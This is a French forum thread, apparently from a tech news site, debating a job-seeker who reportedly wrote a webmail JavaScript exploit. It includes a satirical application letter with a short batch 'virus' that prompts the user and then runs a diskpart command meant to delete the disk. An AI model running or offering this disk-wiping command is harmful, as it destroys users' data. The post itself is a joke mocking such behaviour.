supinfo
Ouverture de  SUPINFO USA à San Francisco en 2008. Des études en informatique en Californie à un tarif abordable ! Inscrivez-vous dès maintenant !
supinfo
Connexion :

Recherche

Tout| Actus| Télécharger| Comparateur de prix| Dossiers| Forums| Jeux| Google

44 messages
ok
Ouais enfin développer un truc en javascript c'est vraiment pas difficile, trouver comment le faire exécuter sur un webmail c'est déjà plus compliqué, mais c'est pas la panacée.

Rien à voir avec les gars qui codent des exploits utilisant des buffers overflow avec adresses des fonctions chargées aléatoires, et qui en plus réussissent à les faire universels (fonctionnent quel que soit l'OS de l'hôte), c'est autrement plus difficile et ils viennent pas pour autant mendier un boulot.

Paul_Hewson a écrit:
Ouais enfin développer un truc en javascript c'est vraiment pas difficile, trouver comment le faire exécuter sur un webmail c'est déjà plus compliqué, mais c'est pas la panacée.

Rien à voir avec les gars qui codent des exploits utilisant des buffers overflow avec adresses des fonctions chargées aléatoires, et qui en plus réussissent à les faire universels (fonctionnent quel que soit l'OS de l'hôte), c'est autrement plus difficile et ils viennent pas pour autant mendier un boulot.
l'écriture du code en soit n'est peut être pas difficile, comme pour AUCUN exploit...
le plus difficile est de TROUVER la faille...

Perso, rien ne justifie ce type de délit...

Bonjour,

Je suis un jeune informaticien à la recherche d'un emploi.

Par la présente, je vous envoie un virus intégré à ce message, pour vous démontrer mes capacités en la matière. Comme je n'ai pas de moyens financiers ni autre pour le répandre, je vous demanderai aimablement de le faire parvenir à tous vos contacts et aussi leur préciser de faire de même.

Je vous remercie de l'attention que vous porterez à ce courrier.

En attendant d'avoir une réponse de votre part, que je souhaite positive en tout point, je vous prie d'agréer, Madame, Monsieur, mes salutations les meilleures.

Chouky - Plouky

PS: Voilà le virus :

@echo off
cls
echo.
echo.
echo Ce virus va détruire toutes vos données du disque dur
echo.
echo Veuillez appuyer sur la touche ENTER
pause
diskpart delete disk override
echo.
echo.
echo Merci d'avoir utilisé mon virus. Veuillez le recommander à tous vos amis.
echo.
echo **************************
echo *©Je-Cherche-Du-Boulot 2006*
echo **************************

44 messages
ok

Vous devez être connecté pour écrire un message !